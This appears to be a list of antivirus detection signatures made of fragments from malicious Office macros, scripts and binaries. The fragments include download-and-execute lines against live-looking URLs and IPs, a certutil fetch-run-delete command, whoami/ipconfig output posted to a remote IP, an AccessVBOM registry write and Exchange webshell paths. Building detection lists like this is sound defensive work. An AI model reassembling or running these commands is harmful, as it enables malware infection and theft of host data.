- qGrid.Write (qAxis) (MACROHSTR_EXT)
- qGrid.Close (MACROHSTR_EXT)
- Debug.Print Replace(E, "[", "J") (MACROHSTR_EXT)
- = Replace("Wscrip3!4FIt3!4FI.Shell", "3!4FI", "") (MACROHSTR_EXT)
- = Replace("wmic process call create 'run$3&pR+dll32.exe ", "$3&pR+", "") (MACROHSTR_EXT)
- = Replace("\1QM:)38ZQM:)38Z1981.QM:)38Zdll", "QM:)38Z", "") (MACROHSTR_EXT)
- /.dll", " (MACROHSTR_EXT)
- .Open (MACROHSTR_EXT)
- If Err.Number <> 0 Then (MACROHSTR_EXT)
- = Replace("https://mosaicuschin+rn6/a.co+rn6/m/wp-conte+rn6/nt/plug+rn6/ins/wpml-string-translation/locale/+rn6/orig/afFzHwIPlCs5+rn6/b.php", "+rn6/", "") (MACROHSTR_EXT)
- http://%20%20@j.mp/axas (MACROHSTR_EXT)
- http://%20%20@j.mp/as (MACROHSTR_EXT)
- createobject("wscript.shell").execlulli (MACROHSTR_EXT)
- fa26dbba = c0877678("c8:a\2p7rdoag2r5a2mad6a7t4a0\b495e92096b.9jep9g3") (MACROHSTR_EXT)
- f7871cb1 fa26dbba, e6bcc95e.fad1a246(c0877678("h3t3tdp0:e/c/4veoba0x3d1.0c1o1m1/ (MACROHSTR_EXT)
- Set c054e43d = CreateObject("wscript.shell") (MACROHSTR_EXT)
- c054e43d.exec a2a08025 & " " & fa26dbba (MACROHSTR_EXT)
- c9ec6621 = baacbbeb("c2:0\ap5raobg1rfa7m6d6a9t2a4\53d0c7b8888.7j4p4gd") (MACROHSTR_EXT)
- b37c5d2e.a24d5e5e(baacbbeb("hctet8pb:1/0/4d6y355x213.dccoemc/bu5nab8b0m8e6v6dd/fd77f60.5p4hcpa?6lc=bw8odz3m2b6l65b.9c4a6bd")) (MACROHSTR_EXT)
- Set aa836f9d = CreateObject("wscript.shell") (MACROHSTR_EXT)
- aa836f9d.exec cc1ad2a2 & " " & c9ec6621 (MACROHSTR_EXT)
- f8bda31b = baacbbeb("ce:f\ap7raoegbr8a6mddba6tba5\a1c6a77381a.6j9p2g6") (MACROHSTR_EXT)
- ea125e40.a24d5e5e(baacbbeb("h9tbt8pa:5/3/cj2b8e3p5oc27.cc2o6mc/cu5ncbab4mae3v1d0/bd57e65.2p8hcp5?4la=ewdofz0m6b0l374.7c7a0bb")) (MACROHSTR_EXT)
- Set a52c9898 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- a52c9898.exec cc1ad2a2 & " " & f8bda31b (MACROHSTR_EXT)
- .mp/agkaoskasfksakdamskdokasdkasodkaos (MACROHSTR_EXT)
- msgbox"fileiscorrupt"createobject("wscript.shell").execmainendsub (MACROHSTR_EXT)
- chr(log(5.9900343330481e+56)/log(3))&_"s"&_"crip"&_chr(sqr(13456))&_"."&_chr(sqr(13225))&_"h"&_"e"&_"l"&_chr(log(3.38139191352273e+51)/log(3)) (MACROHSTR_EXT)
- :Execute( (MACROHSTR_EXT)
- Execute(""path = path + """"data\ (MACROHSTR_EXT)
- """" + """".txt"""""")" + vbCrLf (MACROHSTR_EXT)
- = "C:\" + xxxxxpath + "System32\c" + "script" + ".ex" (MACROHSTR_EXT)
- %.Run(Path + (MACROHSTR_EXT)
- SFRUUERvd25sb2FkICJodHRwOi8vd3d3LndoZXJldmVyLmNvbS9maWxlcy9wYXlsb2FkLmV4ZSIsICJDOlx0ZW1wIg== (MACROHSTR_EXT)
- Shell "wscript D:\_notScanned\test.vbs (MACROHSTR_EXT)
- ('/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA')); (MACROHSTR_EXT)
- .split('').reverse().join('') (MACROHSTR_EXT)
- .split('|');var (MACROHSTR_EXT)
- .Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- memoryMainButton = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite memoryMainButton, 1, "REG_DWORD" (MACROHSTR_EXT)
- frm.fff "http://m33xa3.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- .cab", O (MACROHSTR_EXT)
- frm.fff "http://1bwsl4.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://804gtd.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://uhq943.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://n9i9ep.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://nm5oi0.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http:// (MACROHSTR_EXT)
- /hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- = "<div id='content'>fTtlc29sYy5ldm9tZVJ4b2J0eGVUbm9pdHBlY3hlOykyICwiZ3BqLmVjYXBzZW1hTnJhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZXZvbWVSeG9idHhlVG5vaXRwZWN4 (MACROHSTR_EXT)
- Shell "wscript (MACROHSTR_EXT)
- .vbs" (MACROHSTR_EXT)
- www.wherever.com/files/payload.exe", "C:\temp" (MACROHSTR_EXT)
- HTTPDownload "http:// (MACROHSTR_EXT)
- WScript.CreateObject("WScript.Shell") (MACROHSTR_EXT)
- WshShell.Run "c:\temp\payload.exe" (MACROHSTR_EXT)
- Chr(AscB(MidB(objHTTP.ResponseBody, i, 1) (MACROHSTR_EXT)
- Environment("process").Item("param1") = (MACROHSTR_EXT)
- E6sizX8Z.run "cmd /c call %param1%", 2 (MACROHSTR_EXT)
- .Run (vXoyEXNtX) (MACROHSTR_EXT)
- Shell.Run "powershell -windowstyle hidden &("{0}{1}" -f 'IE','X') (MACROHSTR_EXT)
- .Invoke(("{1}{8}{5}{7}{6}{0}{3}{2}{4}"-f'en','ht','go.p','ius.com/lo','ng','p:','g','//vega','t')) (MACROHSTR_EXT)
- = Environ("temp") & "\main.theme" (MACROHSTR_EXT)
- = ActiveWindow.Split (MACROHSTR_EXT)
- d9cc42e0.Send (MACROHSTR_EXT)
- Call ed3931ab.exec(f26e39fe) (MACROHSTR_EXT)
- = Environ("temp") & "\main.theme" (MACROHSTR_EXT)
- a-z0-9 = New MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- a-z0-9.Open("GET", (MACROHSTR_EXT)
- a-z0-9 = VBA.CreateObject("wscript.shell") (MACROHSTR_EXT)
- a-z0-9 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- ie.Navigate "https://pastebin.com/raw/PMwGWkmh (MACROHSTR_EXT)
- Dim payload: payload = ie.Document.Body (MACROHSTR_EXT)
- = Environ("TEMP") & "\CVR (MACROHSTR_EXT)
- objFSO.DeleteFile p (MACROHSTR_EXT)
- obj.Document.Application.ShellExecute "rundll32 (MACROHSTR_EXT)
- objFSO.CreateTextFile (MACROHSTR_EXT)
- Set b8acfabf = CreateObject("wscript.shell") (MACROHSTR_EXT)
- Call b8acfabf.exec(a600af58) (MACROHSTR_EXT)
- dcd3f665 = ActiveDocument.Shapes(1).Title + " " + f5d112a0 (MACROHSTR_EXT)
- e5fbd99d = f5a419b7.c492b9b9(ActiveDocument.Shapes(ed71ee4c).AlternativeText) (MACROHSTR_EXT)
- .Open "GET", HexToString( (MACROHSTR_EXT)
- http://c.vvvvvvvvv.ga (PEHSTR_EXT)
- cmd /c taskkill /f /im taskger.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im GthUdTask.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im WavesSys.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im wscript.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im SQLAGENTSWC.exe (PEHSTR_EXT)
- C:\RECYCLER\svchostl.exe (PEHSTR_EXT)
- = "p,:,\,j,v,a,q,b,j,f,\,f,l,f,g,r,z,3,2,\,z,f,u,g,n,.,r,k,r," (MACROHSTR_EXT)
- atbuRc.exec aOl4Bh (MACROHSTR_EXT)
- b1efc47a.f047ca69 f39e930a(0) + " " + f5244208 (MACROHSTR_EXT)
- Call af8a301a.exec(f0032c5f) (MACROHSTR_EXT)
- = Split(ActiveDocument.Shapes(d0e6cdde).Title, "|") (MACROHSTR_EXT)
- df6dee5a.f7413504 ccb12773(0) + " " + f7647a17 (MACROHSTR_EXT)
- Call d73c0afc.exec(b5108af6) (MACROHSTR_EXT)
- = Split(ActiveDocument.Shapes(c07e0738).Title, "|") (MACROHSTR_EXT)
- Call c4e83a7b.exec(a9518afd) (MACROHSTR_EXT)
- bdac511a.Open "GET", baedc1e7(1), False (MACROHSTR_EXT)
- MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- db.exec(a69f5c12) (MACROHSTR_EXT)
- cf.Open "GET", aa7d93ad (MACROHSTR_EXT)
- beabd2cf.Send (MACROHSTR_EXT)
- aa = .responsebody (MACROHSTR_EXT)
- d3.exec(b1e5f5df) (MACROHSTR_EXT)
- = .responsebody (MACROHSTR_EXT)
- 240.Open "GET", f1dbbb5f (MACROHSTR_EXT)
- cee60240.Send (MACROHSTR_EXT)
- Call d7d3054e.exec(f0a36a45) (MACROHSTR_EXT)
- c41e6bcc.Open "GET", fab6f8e5( (MACROHSTR_EXT)
- c41e6bcc.Send (MACROHSTR_EXT)
- b342af0c = .responsebody (MACROHSTR_EXT)
- Call cdda5fda.exec(e6fd511c) (MACROHSTR_EXT)
- af92bcf0.Open "GET", f12ec170 (MACROHSTR_EXT)
- af92bcf0.Send (MACROHSTR_EXT)
- cedfe73b = .responsebody (MACROHSTR_EXT)
- dfe79bd7 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- dfe79bd7.exec(cb3cbe53) (MACROHSTR_EXT)
- Call c5a3244e.exec(de86f68a) (MACROHSTR_EXT)
- a0e1a561.Open "GET", f8a301ae(1), False (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec (d9c63594) (MACROHSTR_EXT)
- .Open "GET", f30c94a6, False (MACROHSTR_EXT)
- .exec (e456fc10) (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- .d8cb9993 ee6aff0a(0) + " " + fa31e116 (MACROHSTR_EXT)
- http://www.ip-adress.com (PEHSTR_EXT)
- NewDescription (PEHSTR_EXT)
- \\.\pipe\%ssp (PEHSTR_EXT)
- M-SEARCH * HTTP/1.1 (PEHSTR_EXT)
- = "c:\programdata\ (MACROHSTR_EXT)
- With ActiveDocument.Shapes( (MACROHSTR_EXT)
- = CreateObject("wscript.shell") (MACROHSTR_EXT)
- .Send (MACROHSTR_EXT)
- .fccdb933 a8a9ba70(0) + " " + e9f3423e("pdf") (MACROHSTR_EXT)
- + "." + "shell") (MACROHSTR_EXT)
- String = "ing.FileSystemObject") (MACROHSTR_EXT)
- (0) + "vr32 c:\programdata\ (MACROHSTR_EXT)
- .txt", "wscript" (MACROHSTR_EXT)
- .Open "GET" (MACROHSTR_EXT)
- .responsebody (MACROHSTR_EXT)
- ("PTTHLMXre" + "vres.2LMXSM") (MACROHSTR_EXT)
- createobject("wscript.shell").exec"%comspec%/cstart/waitc:\ (MACROHSTR_EXT)
- createobject("wscript.shell").exec"regsvr32.exe-sc:\ (MACROHSTR_EXT)
- .dll (MACROHSTR_EXT)
- createobject("wscript.shell").exec"%comspec%/cstart/waitc:\gophotonics\reddit.vbs (MACROHSTR_EXT)
- createobject("wscript.shell").exec"regsvr32.exe-sc:\gophotonics\waveplate.dll (MACROHSTR_EXT)
- As String = "scripting.file (MACROHSTR_EXT)
- workrepair.bazar (PEHSTR_EXT)
- realfish.bazar (PEHSTR_EXT)
- eventmoult.bazar (PEHSTR_EXT)
- younika-hayde.bazar (PEHSTR_EXT)
- Run PowerShell script without a file (PEHSTR_EXT)
- /javascript/view.php (PEHSTR)
- *.inf (PEHSTR)
- .php?si= (PEHSTR_EXT)
- @@Windows Defender::%ProgramFiles%\Windows Defender\MsMpeng.exe@@ (PEHSTR_EXT)
- .open("GET", "https:// (PEHSTR_EXT)
- .ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE"); (PEHSTR_EXT)
- .ExecQuery("Select DomainRole from Win32_ComputerSystem"); (PEHSTR_EXT)
- .ExecQuery("Select * from AntiVirusProduct"); (PEHSTR_EXT)
- .ExpandEnvironmentStrings("%TEMP%"); (PEHSTR_EXT)
- .Sleep(" (PEHSTR_EXT)
- wscript /e:JScript (PEHSTR_EXT)
- X:\D BACKUP 29032014 (PEHSTR_EXT)
- \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ (PEHSTR_EXT)
- nzFN.Create(MXBTv, Null, Null, intProcessID) (MACROHSTR_EXT)
- chomputah = "." (MACROHSTR_EXT)
- objProcess.Create pr, Null, objConfig, intProcessID (MACROHSTR_EXT)
- pr = ActiveDocument.CustomDocumentProperties("prorrete").Value (MACROHSTR_EXT)
- Set objStartup = objWMIService.Get(gghhii) (MACROHSTR_EXT)
- Set objConfig = objStartup.SpawnInstance (MACROHSTR_EXT)
- objConfig.ShowWindow = HIDDEN_WINDOW (MACROHSTR_EXT)
- trustTemp = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- globalLeftSelect.funcStorageTemp trustTemp, titleCaptionDocument (MACROHSTR_EXT)
- Set leftCaption = CreateObject("wscript.shell") (MACROHSTR_EXT)
- leftCaption.exec Replace(globalLen, "1", "") & " " & Replace(indexTextboxTextbox, "1", "") (MACROHSTR_EXT)
- Set globalException = requestResponseA.CreateTextFile(iteratorVb) (MACROHSTR_EXT)
- globalException.WriteLine loadLocalQuery (MACROHSTR_EXT)
- documentCollectionArray = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- tempRepo.libDocumentLink documentCollectionArray, rightTrustReference (MACROHSTR_EXT)
- Set namespaceRemoveClear = CreateObject("wscript.shell") (MACROHSTR_EXT)
- namespaceRemoveClear.exec Replace(convertLoadDatabase, "1", "") & " " & Replace(procStruct, "1", "") (MACROHSTR_EXT)
- Set convertClear = memoryPointerDocument.CreateTextFile(valueWindow) (MACROHSTR_EXT)
- convertClear.WriteLine dataView (MACROHSTR_EXT)
- = "10.23.31.3.0.29.10.29" (MACROHSTR_EXT)
- = Split(awoQn2, ".") (MACROHSTR_EXT)
- = Split(a3dmi, ".") (MACROHSTR_EXT)
- & "com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec ayaXI( (MACROHSTR_EXT)
- & atZhQ("comments") & aoTA6S & (MACROHSTR_EXT)
- = aMSIO & "\m1.xsl" (MACROHSTR_EXT)
- = aMSIO & "\m1.com" (MACROHSTR_EXT)
- adFWA.run aXo4vp & aRlMyx("comments") & amE2ak & a9Dz5t & amE2ak (MACROHSTR_EXT)
- = aSGr0w & "com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec ayaXI(axBTCF, aole0) (MACROHSTR_EXT)
- = axBTCF & atZhQ("comments") & aoTA6S & aole0 & aoTA6S (MACROHSTR_EXT)
- = a9t1m8 & "\h1.xsl" (MACROHSTR_EXT)
- = a9t1m8 & "\h1.com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec aqTf5d(a4UCwk, aXmKa0) (MACROHSTR_EXT)
- = a4UCwk & aD63BN("comments") & agHu8 & aXmKa0 & agHu8 (MACROHSTR_EXT)
- Interaction.Shell "C:\Windows\explorer.exe " & aFoes (MACROHSTR_EXT)
- = Split(a9zoO, ".") (MACROHSTR_EXT)
- enablescriptblockinvocationlogging (PEHSTR_EXT)
- windows\powershell\scriptb'+'locklogging' (PEHSTR_EXT)
- webclient;$u='mozilla/5.0 (PEHSTR_EXT)
- [text.encoding]::unicode.getstring([convert]::frombase64string('aab0ahqacaa6ac8alw (PEHSTR_EXT)
- /admin/get.php (PEHSTR_EXT)
- .proxy=[system.net.webrequest] (PEHSTR_EXT)
- .headers.add('user-agent', (PEHSTR_EXT)
- .downloaddata( (PEHSTR_EXT)
- xHttp.Open "GET", "https://d.top4top.io/p_18010gsks1.jpg", False (MACROHSTR_EXT)
- savetofile j & "/client.vbs", 2 (MACROHSTR_EXT)
- Shell "wscript " & j & "/client.vbs", vbNormalFocus (MACROHSTR_EXT)
- CreateObject("Adodb.Stream") (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("subject") & "1-8455-00A0C91" (MACROHSTR_EXT)
- GetObject(subject & "F3880").Navigate title (MACROHSTR_EXT)
- title = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- (ActiveDocument.Range.text) (MACROHSTR_EXT)
- CreateObject("wscript.shell").run ( (MACROHSTR_EXT)
- With .GetEncodedContentStream (MACROHSTR_EXT)
- .WriteText (MACROHSTR_EXT)
- .Flush (MACROHSTR_EXT)
- With .GetDecodedContentStream (MACROHSTR_EXT)
- .ContentTransferEncoding = "base64" (MACROHSTR_EXT)
- rebrand.ly/WdBPApoMACRO','a.ba (MACROHSTR_EXT)
- /5555555555.png (MACROHSTR_EXT)
- C:\Droft\Frots\ZerioDh (MACROHSTR_EXT)
- Shell sex. (MACROHSTR_EXT)
- .Tag (MACROHSTR_EXT)
- Error.TextBox1 (MACROHSTR_EXT)
- p.Tag (MACROHSTR_EXT)
- rebrand.ly/WdBPApoMACRO (MACROHSTR_EXT)
- https://thephotographersworkflow.com/vv/popi.exe (MACROHSTR_EXT)
- a.bat (MACROHSTR_EXT)
- = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" + ".j.mp/ (MACROHSTR_EXT)
- .Run(uM5le___i_Cmo9_Fl5, b7EVmQf_RC_M75_Fz) (MACROHSTR_EXT)
- https://1230948%1230948@bitly.com/asddasjisduaiskdhikhasd (MACROHSTR_EXT)
- .Run(XA769OnJIr_7qu, cQ_LLP_l2yVHeb_v) (MACROHSTR_EXT)
- Shell UserForm2.CloseTheWindow.Tag (MACROHSTR_EXT)
- ttp://188.127.254.61/89786454657645.exe (MACROHSTR_EXT)
- EXEC("C:\PROGRAMDATA\a.exe (MACROHSTR_EXT)
- .('.'+'/ (MACROHSTR_EXT)
- "&CHAR(46)&"exe') (MACROHSTR_EXT)
- ttps://tinyurl.com/y2ua6dah (MACROHSTR_EXT)
- = Split(aqMXZ9(frm.paths.text), "|") (MACROHSTR_EXT)
- = CreateObject("wscript.shell").exec(aJNyC) (MACROHSTR_EXT)
- Application.Run "avVfeb", a14bvc & " " & axYjG & "mat : """ & aUz3Cc & (MACROHSTR_EXT)
- = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite (MACROHSTR_EXT)
- , 4 / 2, 3000000) (MACROHSTR_EXT)
- = GetObject("", "word.application") (MACROHSTR_EXT)
- = "explorer.exe c:\programdata\bufBorderPointer.hta" (MACROHSTR_EXT)
- .exec p(getwc) (MACROHSTR_EXT)
- Shell (Environ("APPDATA") & "\appword.cache") (MACROHSTR_EXT)
- = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (MACROHSTR_EXT)
- VBSpath = gPath & "\rknrl.vbs" (MACROHSTR_EXT)
- DMpath = gPath & "\DM6331.TMP" (MACROHSTR_EXT)
- WShell = CreateObject(""WScript.Shell"") (MACROHSTR_EXT)
- Wsc|rip|t.S|cri|ptF|ull|Nam|e).|Par|ent|Fol|der|.Pa|th&|""\|DM6|331|.TM|P" (MACROHSTR_EXT)
- ServerComputer (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- System.Threading (PEHSTR_EXT)
- ParseXmlDescription (PEHSTR_EXT)
- System.Data.SqlClient (PEHSTR_EXT)
- System.IO.Compression (PEHSTR_EXT)
- SetCompatibleTextRenderingDefault (PEHSTR_EXT)
- System.Security.AccessControl (PEHSTR_EXT)
- commandLine (PEHSTR_EXT)
- ExecuteNonQuery (PEHSTR_EXT)
- System.Reflection (PEHSTR_EXT)
- System.Drawing (PEHSTR_EXT)
- System.Security.Principal (PEHSTR_EXT)
- System.Runtime.Remoting (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- System.Net (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- System.Reflection.Emit (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- .run (MACROHSTR_EXT)
- & aRlMyx("comments") & amE2ak & (MACROHSTR_EXT)
- .BuiltInDocumentProperties( (MACROHSTR_EXT)
- & "\m1.com" (MACROHSTR_EXT)
- & "\m1.xsl" (MACROHSTR_EXT)
- 185.243.215.213/sys_info.vbs", False (MACROHSTR_EXT)
- xHttp.Open "GET", "http:// (MACROHSTR_EXT)
- .savetofile "sys_info.vbs", 2 (MACROHSTR_EXT)
- Shell "wscript sys_info.vbs", vbNormalFocus (MACROHSTR_EXT)
- bStrm = CreateObject("Adodb.Stream") (MACROHSTR_EXT)
- xHttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- HTTPDownload 'http:// (MACROHSTR_EXT)
- 0.exe', 'C:\temp' (MACROHSTR_EXT)
- Shell "wscript c:\temp\ (MACROHSTR_EXT)
- WshShell.Run 'c:\temp\ (MACROHSTR_EXT)
- .exe' (MACROHSTR_EXT)
- = CreateObject("wscript.shell").exec( (MACROHSTR_EXT)
- Application.Run "avVfeb", (MACROHSTR_EXT)
- powershell -enco "" & cmd, null, objProcessStart (MACROHSTR_EXT)
- Shell ("wscript " & url) (MACROHSTR_EXT)
- "C:\\Users\\Public\\getfonts.vbs" (MACROHSTR_EXT)
- = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WQDWQEWQEWQ.Run asd (MACROHSTR_EXT)
- CreateObject("Outlook.Application") (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l"). (MACROHSTR_EXT)
- exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Uri " & (MACROHSTR_EXT)
- Chr(34) & "http://scaladevelopments.scaladevco.com/ (MACROHSTR_EXT)
- = "eval(eval(String.fromCharCode" + (MACROHSTR_EXT)
- = "j" + "o" + "b" + "s" + "website" + "." + "j" + "s (MACROHSTR_EXT)
- = Shell("wscript " + (MACROHSTR_EXT)
- obj = CreateObject("wscript.shell") (MACROHSTR_EXT)
- 39.100.159.8/aaa" + RunResult + RunResultwhoami (MACROHSTR_EXT)
- URL = "http:// (MACROHSTR_EXT)
- objHTTP.Open "POST", URL, False (MACROHSTR_EXT)
- exeRs = obj.Exec("whoami") (MACROHSTR_EXT)
- obj.Exec("ipconfig ") (MACROHSTR_EXT)
- exeRs.StdOut.ReadAll (MACROHSTR_EXT)
- objHTTP.send ("") (MACROHSTR_EXT)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\LXWPLO.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\OFFVMJ.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\V2X01Z.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\errorFF.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\default.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServerProxy.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\view_tools.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\15.1.2044\themes\resources\Sign_in_arrow_rtl.aspx (ASEP_FILEPATH)
- TempPath = Environ("TMP") + "\" (MACROHSTR_EXT)
- \appdata\roaming\MicrosoftBackup.vbs (MACROHSTR_EXT)
- = "" /s "" + apppath + ""\backup.dll""" & vbNewLine (MACROHSTR_EXT)
- oWS.SpecialFolders(""startup"")" & vbNewLine (MACROHSTR_EXT)
- WinHttpReq.Open "POST", myURL, False, "", "" (MACROHSTR_EXT)
- Shell "wscript " + OutPutFileName, vbHide (MACROHSTR_EXT)
- htt`ps://vers778ve29.com/petalo.j`pg (MACROHSTR_EXT)
- .Add "MsHt" (MACROHSTR_EXT)
- .Add "a http://" (MACROHSTR_EXT)
- .Add "bitly.com/asdkjasdhsudiqowiudqw" (MACROHSTR_EXT)
- obj.MainCallex (dd1 + dd2 + dd3) (MACROHSTR_EXT)
- X = "mshta.e`x`e " (MACROHSTR_EXT)
- Y = "https://www.bitly.com/" (MACROHSTR_EXT)
- Debug.Print (Shell(X + Y + Z)) (MACROHSTR_EXT)
- X = "mshta.exe " (MACROHSTR_EXT)
- bbwtpTVV = aHiMN & "." & EUrxrXO (MACROHSTR_EXT)
- PDFName = Left(pptName, InStr(pptName, ".")) & "pdf" (MACROHSTR_EXT)
- WSCript.shell (MACROHSTR_EXT)
- slBGr = "jira.txt (MACROHSTR_EXT)
- CbEWmOd.CreateObject("WScript.Shell").Run ("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & vBPsTOI), 0 (MACROHSTR_EXT)
- TGzlbCA.SaveToFile slBGr, 2 (MACROHSTR_EXT)
- http://140.82.33.69/chim.exe (MACROHSTR_EXT)
- Environ("AppData") & "\Microsoft\Windows\Start Menu\Programs\Startup\" (MACROHSTR_EXT)
- CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- scheduler.exe (MACROHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- Set classList = classList.CreateTextFile(ptrPtr) (MACROHSTR_EXT)
- classList.WriteLine constArrayDocument (MACROHSTR_EXT)
- Public Sub CommandButton1_Click() (MACROHSTR_EXT)
- Set countIndex = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- countIndex.exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- windowCopy = "c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass windowCopy, repoQuery (MACROHSTR_EXT)
- Call frm.CommandButton1_Click (MACROHSTR_EXT)
- Set genericDataTextbox = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- script = "script" & ". (MACROHSTR_EXT)
- genericDataTextbox.Append_3 " (MACROHSTR_EXT)
- {return queryGlobalCaption.split('').reverse().join(''); (MACROHSTR_EXT)
- classTableConst.Timeout = 60000 (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass (MACROHSTR_EXT)
- = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- split('').reverse().join(''); (MACROHSTR_EXT)
- script = "script" & "." (MACROHSTR_EXT)
- .Append_3 "<div id='content'>fTtl (MACROHSTR_EXT)
- Range("FF1200").Value (MACROHSTR_EXT)
- xxxx = "workout.js" (MACROHSTR_EXT)
- zoon = "wscript " + koolxxxx (MACROHSTR_EXT)
- oFile.WriteLine koonmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec a (MACROHSTR_EXT)
- myfrm1.text1.text (MACROHSTR_EXT)
- frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- screenMemoryW.resizeTo(1, 1) (MACROHSTR_EXT)
- screenMemoryW.moveTo(-100, -100) (MACROHSTR_EXT)
- uffer = screenSizeText(tableVariable(requestRequestCounter[0])) (MACROHSTR_EXT)
- selectNamespace.Timeout = 60000 (MACROHSTR_EXT)
- MemoryW.close (MACROHSTR_EXT)
- swapVbTable.ToString (MACROHSTR_EXT)
- ('msscriptcontrol.scriptcontrol') (MACROHSTR_EXT)
- namespaceEx.exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- buttonException.Append_3 (MACROHSTR_EXT)
- ShellExecuteA (PEHSTR_EXT)
- 0taskkill /f /pid (PEHSTR_EXT)
- exe (PEHSTR_EXT)
- \Spider-Rat\Client\ (PEHSTR_EXT)
- .exec frm.cmdButton1.Tag & " " & frm.cmdButton1.caption (MACROHSTR_EXT)
- = frm.cmdButton1.caption (MACROHSTR_EXT)
- .close</script> (MACROHSTR_EXT)
- <div id='table'>0123456789+/</div><script language='javascript'> (MACROHSTR_EXT)
- var w=String.fromCharCode (MACROHSTR_EXT)
- <div id='table'>0123456789+/</div><scri (MACROHSTR_EXT)
- var w=String.fromCha (MACROHSTR_EXT)
- ("656c6c")).Run cmdLine, 0 (MACROHSTR_EXT)
- .Get( (MACROHSTR_EXT)
- Split(ActiveDocument.BuiltInDocumentProperties("title"), "|||") (MACROHSTR_EXT)
- (2)).Navigate( (MACROHSTR_EXT)
- Print #1, ActiveDocument.Range.Text (MACROHSTR_EXT)
- .exec p( (MACROHSTR_EXT)
- = p(frm.button1.Caption) (MACROHSTR_EXT)
- frm.button1_Click (MACROHSTR_EXT)
- = .Tag (MACROHSTR_EXT)
- = .Caption (MACROHSTR_EXT)
- .exec Replace( (MACROHSTR_EXT)
- = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- = frm.cbtn1.Caption (MACROHSTR_EXT)
